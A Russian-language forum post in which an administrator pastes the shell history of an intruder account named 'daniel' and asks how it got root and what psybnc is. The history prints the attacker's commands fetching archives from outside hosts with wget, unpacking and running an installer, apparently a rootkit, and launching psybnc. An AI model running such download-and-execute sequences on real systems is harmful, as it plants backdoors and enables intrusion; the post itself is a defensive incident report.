Новый пользователь и новая группа, называются daniel.
Вот история того, что сделал daniel (подключившись через ssh):
=================================================
# START CUT
=================================================
w
// ftp был запрещен. Человек решил использовать wget
ftp -v 209.171.43.28
// :)
wgte
wget
wget snow.prohosting.com/dani3l/daniel.tgz
wget ps-lov.us/daniel.tgz
tar xzvf daniel.tgz
cd daniel
./install
mkdir dan
cd dan
wget snow.prohosting.com/uzzy05/psycompilde.tgz
wget snow.prohosting.com/uzzy05/psybnc.tgz
tar xzvf psybnc.tgz
cd psybnc
./psybnc
ps axd
ps ax
kill -9 1741
=================================================
# END CUT
=================================================
Кто может объяснить:
как пользователь мог получить права root,
почему в логах я не увидел создание нового пользователя
daniel,
что за программа psybnc
В папке daniel/dan была куча всяких стандартных программ,
которые, по-видимому, подправлены для более легкого доступа к системе в дальнейшем.
Почему пользователь позже работал только под логином daniel
Что делать и чего читать?